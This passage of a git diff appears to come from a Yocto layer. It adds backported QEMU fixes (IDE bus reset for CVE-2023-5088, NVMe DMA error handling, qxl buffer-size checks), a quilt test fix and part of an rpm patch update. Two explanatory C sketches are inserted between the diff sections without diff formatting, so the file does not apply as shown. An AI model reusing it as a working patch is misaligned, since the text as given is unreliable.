+> #2 0x00005595ace6f778 in dma_blk_io (ctx=0x5595ae0609f0,
+> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+> io_func=io_func@entry=0x5595ace6ee30 <dma_blk_write_io_func>,
+> io_func_opaque=io_func_opaque@entry=0x5595ae2c6c30,
+> cb=0x5595acd40b30 <ide_dma_cb>, opaque=0x5595af6949d0,
+> dir=DMA_DIRECTION_TO_DEVICE) at ../softmmu/dma-helpers.c:244
+> #3 0x00005595ace6f90a in dma_blk_write (blk=0x5595ae2c6c30,
+> sg=sg@entry=0x5595af694d00, offset=offset@entry=0, align=align@entry=512,
+> cb=cb@entry=0x5595acd40b30 <ide_dma_cb>, opaque=opaque@entry=0x5595af6949d0)
+> at ../softmmu/dma-helpers.c:280
+> #4 0x00005595acd40e18 in ide_dma_cb (opaque=0x5595af6949d0, ret=<optimized out>)
+> at ../hw/ide/core.c:953
+> #5 0x00005595ace6f319 in dma_complete (ret=0, dbs=0x7f64600089a0)
+> at ../softmmu/dma-helpers.c:107
+> #6 dma_blk_cb (opaque=0x7f64600089a0, ret=0) at ../softmmu/dma-helpers.c:127
+> #7 0x00005595ad12227d in blk_aio_complete (acb=0x7f6460005b10)
+> at ../block/block-backend.c:1527
+> #8 blk_aio_complete (acb=0x7f6460005b10) at ../block/block-backend.c:1524
+> #9 blk_aio_write_entry (opaque=0x7f6460005b10) at ../block/block-backend.c:1594
+> #10 0x00005595ad258cfb in coroutine_trampoline (i0=<optimized out>,
+> i1=<optimized out>) at ../util/coroutine-ucontext.c:177
+
+Signed-off-by: Fiona Ebner <f.ebner@proxmox.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Tested-by: simon.rowe@nutanix.com
+Message-ID: <20230906130922.142845-1-f.ebner@proxmox.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/7d7512019fc40c577e2bdd61f114f31a9eb84a8e]
+CVE: CVE-2023-5088
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/ide/core.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/hw/ide/core.c b/hw/ide/core.c
+index b5e0dcd29b2..63ba665f3d2 100644
+--- a/hw/ide/core.c
++++ b/hw/ide/core.c
+@@ -2515,19 +2515,19 @@ static void ide_dummy_transfer_stop(IDEState *s)
+
+ void ide_bus_reset(IDEBus *bus)
+ {
+- bus->unit = 0;
+- bus->cmd = 0;
+- ide_reset(&bus->ifs[0]);
+- ide_reset(&bus->ifs[1]);
+- ide_clear_hob(bus);
+-
+- /* pending async DMA */
++ /* pending async DMA - needs the IDEState before it is reset */
+ if (bus->dma->aiocb) {
+ trace_ide_bus_reset_aio();
+ blk_aio_cancel(bus->dma->aiocb);
+ bus->dma->aiocb = NULL;
+ }
+
++ bus->unit = 0;
++ bus->cmd = 0;
++ ide_reset(&bus->ifs[0]);
++ ide_reset(&bus->ifs[1]);
++ ide_clear_hob(bus);
++
+ /* reset dma provider too */
+ if (bus->dma->ops->reset) {
+ bus->dma->ops->reset(bus->dma);
+--
+GitLab
+
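A reduced sketch of the ordering the patch enforces: cancel any in-flight asynchronous operation while the state it references is still intact, and only then clear that state. The struct and function names are illustrative, not the QEMU IDE API:

    #include <stddef.h>

    struct dev_state {
        void *aiocb;    /* pending async request, NULL when idle */
        int unit;
        int cmd;
    };

    static void cancel_aio(void *aiocb)
    {
        (void)aiocb;    /* stand-in for blk_aio_cancel() */
    }

    static void dev_reset(struct dev_state *s)
    {
        /* 1. cancel pending I/O first: its completion callback may still
         *    look at the pre-reset device state */
        if (s->aiocb) {
            cancel_aio(s->aiocb);
            s->aiocb = NULL;
        }

        /* 2. only now wipe the device state */
        s->unit = 0;
        s->cmd = 0;
    }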
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
new file mode 100644
index 0000000000..0fdae8351a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-handle-dma-errors.patch
@@ -0,0 +1,146 @@
+From ea2a7c7676d8eb9d1458eaa4b717df46782dcb3a Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:07:17 -0700
+Subject: [PATCH 2/2] hw/block/nvme: handle dma errors
+
+Handling DMA errors gracefully is required for the device to pass the
+block/011 test ("disable PCI device while doing I/O") in the blktests
+suite.
+
+With this patch the device sets the Controller Fatal Status bit in the
+CSTS register when it fails to read from a submission queue or to write to
+a completion queue, expecting the host to reset the controller.
+
+If DMA errors occur at any other point in the execution of the command
+(say, while mapping the PRPs), the command is aborted with a Data
+Transfer Error status code.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c | 41 +++++++++++++++++++++++++++++++----------
+ hw/block/trace-events | 3 +++
+ 2 files changed, 34 insertions(+), 10 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index e6f24a6..bda446d 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,14 +60,14 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+ return addr >= low && addr < hi;
+ }
+
+-static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
++static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+- return;
++ return 0;
+ }
+
+- pci_dma_read(&n->parent_obj, addr, buf, size);
++ return pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+@@ -152,6 +152,7 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+ hwaddr trans_len = n->page_size - (prp1 % n->page_size);
+ trans_len = MIN(len, trans_len);
+ int num_prps = (len >> n->page_bits) + 1;
++ int ret;
+
+ if (unlikely(!prp1)) {
+ trace_nvme_err_invalid_prp();
+@@ -178,7 +179,11 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+
+ nents = (len + n->page_size - 1) >> n->page_bits;
+ prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+- nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++ ret = nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
++ if (ret) {
++ trace_pci_nvme_err_addr_read(prp2);
++ return NVME_DATA_TRAS_ERROR;
++ }
+ while (len != 0) {
+ uint64_t prp_ent = le64_to_cpu(prp_list[i]);
+
+@@ -191,8 +196,12 @@ static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
+ i = 0;
+ nents = (len + n->page_size - 1) >> n->page_bits;
+ prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
+- nvme_addr_read(n, prp_ent, (void *)prp_list,
+- prp_trans);
++ ret = nvme_addr_read(n, prp_ent, (void *)prp_list,
++ prp_trans);
++ if (ret) {
++ trace_pci_nvme_err_addr_read(prp_ent);
++ return NVME_DATA_TRAS_ERROR;
++ }
+ prp_ent = le64_to_cpu(prp_list[i]);
+ }
+
+@@ -286,6 +295,7 @@ static void nvme_post_cqes(void *opaque)
+ NvmeCQueue *cq = opaque;
+ NvmeCtrl *n = cq->ctrl;
+ NvmeRequest *req, *next;
++ int ret;
+
+ QTAILQ_FOREACH_SAFE(req, &cq->req_list, entry, next) {
+ NvmeSQueue *sq;
+@@ -295,15 +305,21 @@ static void nvme_post_cqes(void *opaque)
+ break;
+ }
+
+- QTAILQ_REMOVE(&cq->req_list, req, entry);
+ sq = req->sq;
+ req->cqe.status = cpu_to_le16((req->status << 1) | cq->phase);
+ req->cqe.sq_id = cpu_to_le16(sq->sqid);
+ req->cqe.sq_head = cpu_to_le16(sq->head);
+ addr = cq->dma_addr + cq->tail * n->cqe_size;
++ ret = pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
++ sizeof(req->cqe));
++ if (ret) {
++ trace_pci_nvme_err_addr_write(addr);
++ trace_pci_nvme_err_cfs();
++ n->bar.csts = NVME_CSTS_FAILED;
++ break;
++ }
++ QTAILQ_REMOVE(&cq->req_list, req, entry);
+ nvme_inc_cq_tail(cq);
+- pci_dma_write(&n->parent_obj, addr, (void *)&req->cqe,
+- sizeof(req->cqe));
+ QTAILQ_INSERT_TAIL(&sq->req_list, req, entry);
+ }
+ if (cq->tail != cq->head) {
+@@ -888,7 +904,12 @@ static void nvme_process_sq(void *opaque)
+
+ while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
+ addr = sq->dma_addr + sq->head * n->sqe_size;
+- nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
++ if (nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd))) {
++ trace_pci_nvme_err_addr_read(addr);
++ trace_pci_nvme_err_cfs();
++ n->bar.csts = NVME_CSTS_FAILED;
++ break;
++ }
+ nvme_inc_sq_head(sq);
+
+ req = QTAILQ_FIRST(&sq->req_list);
+diff --git a/hw/block/trace-events b/hw/block/trace-events
+index c03e80c..4e4ad4e 100644
+--- a/hw/block/trace-events
++++ b/hw/block/trace-events
+@@ -60,6 +60,9 @@ nvme_mmio_shutdown_set(void) "shutdown bit set"
+ nvme_mmio_shutdown_cleared(void) "shutdown bit cleared"
+
+ # nvme traces for error conditions
++pci_nvme_err_addr_read(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_addr_write(uint64_t addr) "addr 0x%"PRIx64""
++pci_nvme_err_cfs(void) "controller fatal status"
+ nvme_err_invalid_dma(void) "PRP/SGL is too small for transfer size"
+ nvme_err_invalid_prplist_ent(uint64_t prplist) "PRP list entry is null or not page aligned: 0x%"PRIx64""
+ nvme_err_invalid_prp2_align(uint64_t prp2) "PRP2 is not page aligned: 0x%"PRIx64""
+--
+1.8.3.1
+
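A small sketch of the error-handling pattern the patch introduces: DMA reads now return a status, and a failed read of a queue entry sets the Controller Fatal Status bit and stops processing rather than acting on uninitialised data. All names below are illustrative:

    #include <stdbool.h>
    #include <stdint.h>

    #define CSTS_FAILED 0x2u    /* Controller Fatal Status bit */

    struct ctrl {
        uint32_t csts;          /* controller status register */
    };

    static int dma_read(struct ctrl *c, uint64_t addr, void *buf, int size)
    {
        (void)c; (void)addr; (void)buf; (void)size;
        return 0;               /* stand-in for pci_dma_read() */
    }

    static bool fetch_command(struct ctrl *c, uint64_t addr, void *cmd, int size)
    {
        if (dma_read(c, addr, cmd, size) != 0) {
            c->csts |= CSTS_FAILED;   /* host is expected to reset the controller */
            return false;
        }
        return true;
    }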
diff --git a/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
new file mode 100644
index 0000000000..66ada52efb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-block-nvme-refactor-nvme_addr_read.patch
@@ -0,0 +1,55 @@
+From 55428706d5b0b8889b8e009eac77137bb556a4f0 Mon Sep 17 00:00:00 2001
+From: Klaus Jensen <k.jensen@samsung.com>
+Date: Tue, 9 Jun 2020 21:03:17 +0200
+Subject: [PATCH 1/2] hw/block/nvme: refactor nvme_addr_read
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Pull the controller memory buffer check to its own function. The check
+will be used on its own in later patches.
+
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Maxim Levitsky <mlevitsk@redhat.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Message-Id: <20200609190333.59390-7-its@irrelevant.dk>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+---
+ hw/block/nvme.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index 12d8254..e6f24a6 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -52,14 +52,22 @@
+
+ static void nvme_process_sq(void *opaque);
+
++static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
++{
++ hwaddr low = n->ctrl_mem.addr;
++ hwaddr hi = n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size);
++
++ return addr >= low && addr < hi;
++}
++
+ static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
+- if (n->cmbsz && addr >= n->ctrl_mem.addr &&
+- addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
++ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+- } else {
+- pci_dma_read(&n->parent_obj, addr, buf, size);
++ return;
+ }
++
++ pci_dma_read(&n->parent_obj, addr, buf, size);
+ }
+
+ static int nvme_check_sqid(NvmeCtrl *n, uint16_t sqid)
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
new file mode 100644
index 0000000000..f380be486c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch
@@ -0,0 +1,236 @@
+From 5a44a01c9eca6507be45d107c27377a3e8d0ee8c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
+Date: Mon, 28 Nov 2022 21:27:39 +0100
+Subject: [PATCH] hw/display/qxl: Pass requested buffer size to qxl_phys2virt()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Currently qxl_phys2virt() doesn't check for buffer overrun.
+In order to do so in the next commit, pass the buffer size
+as argument.
+
+For QXLCursor in qxl_render_cursor() -> qxl_cursor() we
+verify the size of the chunked data ahead, checking we can
+access 'sizeof(QXLCursor) + chunk->data_size' bytes.
+Since in the SPICE_CURSOR_TYPE_MONO case the cursor is
+assumed to fit in one chunk, no change are required.
+In SPICE_CURSOR_TYPE_ALPHA the ahead read is handled in
+qxl_unpack_chunks().
+
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Acked-by: Gerd Hoffmann <kraxel@redhat.com>
+Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
+Message-Id: <20221128202741.4945-4-philmd@linaro.org>
+
+Backport and rebase the patch to fix a compile error introduced by CVE-2022-4144.patch:
+
+/qxl.c: In function 'qxl_phys2virt':
+| /home/hitendra/work/yocto-work/cgx-data/dunfell-3.1/x86-generic-64-5.4-3.1-cgx/project/tmp/work/i586-montavistamllib32-linux/lib32-qemu/4.2.0-r0.8/qemu-4.2.0/hw/display/qxl.c:1508:67: error: 'size' undeclared (first use in this function); did you mean 'gsize'?
+| 1508 | if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
+| | ^~~~
+| | gsize
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/61c34fc && https://gitlab.com/qemu-project/qemu/-/commit/8efec0ef8bbc1e75a7ebf6e325a35806ece9b39f]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ hw/display/qxl-logger.c | 22 +++++++++++++++++++---
+ hw/display/qxl-render.c | 20 ++++++++++++++++----
+ hw/display/qxl.c | 17 +++++++++++------
+ hw/display/qxl.h | 3 ++-
+ 4 files changed, 48 insertions(+), 14 deletions(-)
+
+diff --git a/hw/display/qxl-logger.c b/hw/display/qxl-logger.c
+index 2ec6d8fa..031ddfec 100644
+--- a/hw/display/qxl-logger.c
++++ b/hw/display/qxl-logger.c
+@@ -106,7 +106,7 @@ static int qxl_log_image(PCIQXLDevice *qxl, QXLPHYSICAL addr, int group_id)
+ QXLImage *image;
+ QXLImageDescriptor *desc;
+
+- image = qxl_phys2virt(qxl, addr, group_id);
++ image = qxl_phys2virt(qxl, addr, group_id, sizeof(QXLImage));
+ if (!image) {
+ return 1;
+ }
+@@ -216,7 +216,8 @@ int qxl_log_cmd_cursor(PCIQXLDevice *qxl, QXLCursorCmd *cmd, int group_id)
+ cmd->u.set.position.y,
+ cmd->u.set.visible ? "yes" : "no",
+ cmd->u.set.shape);
+- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id);
++ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, group_id,
++ sizeof(QXLCursor));
+ if (!cursor) {
+ return 1;
+ }
+@@ -238,6 +239,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ {
+ bool compat = ext->flags & QXL_COMMAND_FLAG_COMPAT;
+ void *data;
++ size_t datasz;
+ int ret;
+
+ if (!qxl->cmdlog) {
+@@ -249,7 +251,20 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ qxl_name(qxl_type, ext->cmd.type),
+ compat ? "(compat)" : "");
+
+- data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ switch (ext->cmd.type) {
++ case QXL_CMD_DRAW:
++ datasz = compat ? sizeof(QXLCompatDrawable) : sizeof(QXLDrawable);
++ break;
++ case QXL_CMD_SURFACE:
++ datasz = sizeof(QXLSurfaceCmd);
++ break;
++ case QXL_CMD_CURSOR:
++ datasz = sizeof(QXLCursorCmd);
++ break;
++ default:
++ goto out;
++ }
++ data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id, datasz);
+ if (!data) {
+ return 1;
+ }
+@@ -271,6 +286,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
+ qxl_log_cmd_cursor(qxl, data, ext->group_id);
+ break;
+ }
++out:
+ fprintf(stderr, "\n");
+ return 0;
+ }
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index d532e157..a65a6d64 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -107,7 +107,9 @@ static void qxl_render_update_area_unlocked(PCIQXLDevice *qxl)
+ qxl->guest_primary.resized = 0;
+ qxl->guest_primary.data = qxl_phys2virt(qxl,
+ qxl->guest_primary.surface.mem,
+- MEMSLOT_GROUP_GUEST);
++ MEMSLOT_GROUP_GUEST,
++ qxl->guest_primary.abs_stride
++ * height);
+ if (!qxl->guest_primary.data) {
+ return;
+ }
+@@ -222,7 +224,8 @@ static void qxl_unpack_chunks(void *dest, size_t size, PCIQXLDevice *qxl,
+ if (offset == size) {
+ return;
+ }
+- chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id);
++ chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id,
++ sizeof(QXLDataChunk) + chunk->data_size);
+ if (!chunk) {
+ return;
+ }
+@@ -289,7 +292,8 @@ fail:
+ /* called from spice server thread context only */
+ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
+ {
+- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLCursorCmd));
+ QXLCursor *cursor;
+ QEMUCursor *c;
+
+@@ -308,7 +312,15 @@ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
+ }
+ switch (cmd->type) {
+ case QXL_CURSOR_SET:
+- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id);
++ /* First read the QXLCursor to get QXLDataChunk::data_size ... */
++ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
++ sizeof(QXLCursor));
++ if (!cursor) {
++ return 1;
++ }
++ /* Then read including the chunked data following QXLCursor. */
++ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
++ sizeof(QXLCursor) + cursor->chunk.data_size);
+ if (!cursor) {
+ return 1;
+ }
+diff --git a/hw/display/qxl.c b/hw/display/qxl.c
+index 6bc8385b..858d3e93 100644
+--- a/hw/display/qxl.c
++++ b/hw/display/qxl.c
+@@ -275,7 +275,8 @@ static void qxl_spice_monitors_config_async(PCIQXLDevice *qxl, int replay)
+ QXL_IO_MONITORS_CONFIG_ASYNC));
+ }
+
+- cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST);
++ cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST,
++ sizeof(QXLMonitorsConfig));
+ if (cfg != NULL && cfg->count == 1) {
+ qxl->guest_primary.resized = 1;
+ qxl->guest_head0_width = cfg->heads[0].width;
+@@ -460,7 +461,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
+ switch (le32_to_cpu(ext->cmd.type)) {
+ case QXL_CMD_SURFACE:
+ {
+- QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLSurfaceCmd));
+
+ if (!cmd) {
+ return 1;
+@@ -494,7 +496,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
+ }
+ case QXL_CMD_CURSOR:
+ {
+- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLCursorCmd));
+
+ if (!cmd) {
+ return 1;
+@@ -674,7 +677,8 @@ static int interface_get_command(QXLInstance *sin, struct QXLCommandExt *ext)
+ *
+ * https://cgit.freedesktop.org/spice/win32/qxl-wddm-dod/commit/?id=f6e099db39e7d0787f294d5fd0dce328b5210faa
+ */
+- void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++ void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++ sizeof(QXLCommandRing));
+ if (msg != NULL && (
+ msg < (void *)qxl->vga.vram_ptr ||
+ msg > ((void *)qxl->vga.vram_ptr + qxl->vga.vram_size))) {
+@@ -1494,7 +1498,8 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ }
+
+ /* can be also called from spice server thread context */
+-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
++void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id,
++ size_t size)
+ {
+ uint64_t offset;
+ uint32_t slot;
+@@ -1994,7 +1999,7 @@ static void qxl_dirty_surfaces(PCIQXLDevice *qxl)
+ }
+
+ cmd = qxl_phys2virt(qxl, qxl->guest_surfaces.cmds[i],
+- MEMSLOT_GROUP_GUEST);
++ MEMSLOT_GROUP_GUEST, sizeof(QXLSurfaceCmd));
+ assert(cmd);
+ assert(cmd->type == QXL_SURFACE_CMD_CREATE);
+ qxl_dirty_one_surface(qxl, cmd->u.surface_create.data,
+diff --git a/hw/display/qxl.h b/hw/display/qxl.h
+index 80eb0d26..fcfd133a 100644
+--- a/hw/display/qxl.h
++++ b/hw/display/qxl.h
+@@ -147,7 +147,8 @@ typedef struct PCIQXLDevice {
+ #define QXL_DEFAULT_REVISION QXL_REVISION_STABLE_V12
+
+ /* qxl.c */
+-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id);
++void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id,
++ size_t size);
+ void qxl_set_guest_bug(PCIQXLDevice *qxl, const char *msg, ...)
+ GCC_FMT_ATTR(2, 3);
+
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu_4.2.0.bb b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
index 9c76144749..05449afe4e 100644
--- a/meta/recipes-devtools/qemu/qemu_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
@@ -24,7 +24,8 @@ do_install_append_class-nativesdk() {
}
PACKAGECONFIG ??= " \
- fdt sdl kvm \
+ fdt sdl kvm slirp \
${@bb.utils.filter('DISTRO_FEATURES', 'alsa xen', d)} \
+ ${@bb.utils.filter('DISTRO_FEATURES', 'seccomp', d)} \
"
-PACKAGECONFIG_class-nativesdk ??= "fdt sdl kvm"
+PACKAGECONFIG:class-nativesdk ??= "fdt sdl kvm slirp"
diff --git a/meta/recipes-devtools/quilt/quilt.inc b/meta/recipes-devtools/quilt/quilt.inc
index d6d06c049c..ad23b8d922 100644
--- a/meta/recipes-devtools/quilt/quilt.inc
+++ b/meta/recipes-devtools/quilt/quilt.inc
@@ -12,6 +12,7 @@ SRC_URI = "${SAVANNAH_GNU_MIRROR}/quilt/quilt-${PV}.tar.gz \
file://Makefile \
file://test.sh \
file://0001-tests-Allow-different-output-from-mv.patch \
+ file://faildiff-order.patch \
"
SRC_URI_append_class-target = " file://gnu_patch_test_fix_target.patch"
@@ -30,7 +31,7 @@ EXTRA_OECONF = "--with-perl='${USRBINPATH}/env perl' --with-patch=patch"
EXTRA_OECONF_append_class-native = " --disable-nls"
EXTRA_AUTORECONF += "--exclude=aclocal"
-CACHED_CONFIGUREVARS += "ac_cv_path_BASH=/bin/bash"
+CACHED_CONFIGUREVARS += "ac_cv_path_BASH=/bin/bash ac_cv_path_COLUMN=column"
# Make sure we don't have "-w" in shebang lines: it breaks using
# "/usr/bin/env perl" as parser
diff --git a/meta/recipes-devtools/quilt/quilt/faildiff-order.patch b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
new file mode 100644
index 0000000000..f22065a250
--- /dev/null
+++ b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
@@ -0,0 +1,41 @@
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 4dfe7f9e702c85243a71e4de267a13e434b6d6c2 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Fri, 20 Jan 2023 12:56:08 +0100
+Subject: [PATCH] test: Fix a race condition
+
+The test suite does not differentiate between stdout and stderr. When
+messages are printed to both, the order in which they will reach us
+is apparently not guaranteed. Ideally this would be deterministic, but
+until then, explicitly test stdout and stderr separately in the test
+case itself. Otherwise the test suite fails randomly, which is a pain
+for distribution package maintainers.
+
+This fixes bug #63651 reported by Ross Burton:
+https://savannah.nongnu.org/bugs/index.php?63651
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+---
+ test/faildiff.test | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/test/faildiff.test b/test/faildiff.test
+index 5afb8e3..0444c15 100644
+--- a/test/faildiff.test
++++ b/test/faildiff.test
+@@ -27,8 +27,9 @@ What happens on binary files?
+ > File test.bin added to patch %{P}test.diff
+
+ $ printf "\\003\\000\\001" > test.bin
+- $ quilt diff -pab --no-index
++ $ quilt diff -pab --no-index 2>/dev/null
+ >~ (Files|Binary files) a/test\.bin and b/test\.bin differ
++ $ quilt diff -pab --no-index >/dev/null
+ > Diff failed on file 'test.bin', aborting
+ $ echo %{?}
+ > 1
+--
+2.34.1
+
diff --git a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
index 6454785254..dc3f74fecd 100644
--- a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
+++ b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
@@ -11,36 +11,39 @@ CPU thread.
Upstream-Status: Pending [merge of multithreading patches to upstream]
Signed-off-by: Peter Bergin <peter@berginkonsult.se>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
---
- rpmio/rpmio.c | 34 ++++++++++++++++++++++++++++++++++
- 1 file changed, 34 insertions(+)
+ rpmio/rpmio.c | 36 ++++++++++++++++++++++++++++++++++++
+ 1 file changed, 36 insertions(+)
diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
index e051c98..b3c56b6 100644
--- a/rpmio/rpmio.c
+++ b/rpmio/rpmio.c
-@@ -845,6 +845,40 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
+@@ -845,6 +845,42 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
}
#endif
-+ struct rlimit virtual_memory;
-+ getrlimit(RLIMIT_AS, &virtual_memory);
-+ if (virtual_memory.rlim_cur != RLIM_INFINITY) {
++ struct rlimit virtual_memory = {RLIM_INFINITY , RLIM_INFINITY};
++ int status = getrlimit(RLIMIT_AS, &virtual_memory);
++ if ((status != -1) && (virtual_memory.rlim_cur != RLIM_INFINITY)) {
+ const uint64_t virtual_memlimit = virtual_memory.rlim_cur;
++ uint32_t threads_max = lzma_cputhreads();
+ const uint64_t virtual_memlimit_per_cpu_thread =
-+ virtual_memlimit / lzma_cputhreads();
-+ uint64_t memory_usage_virt;
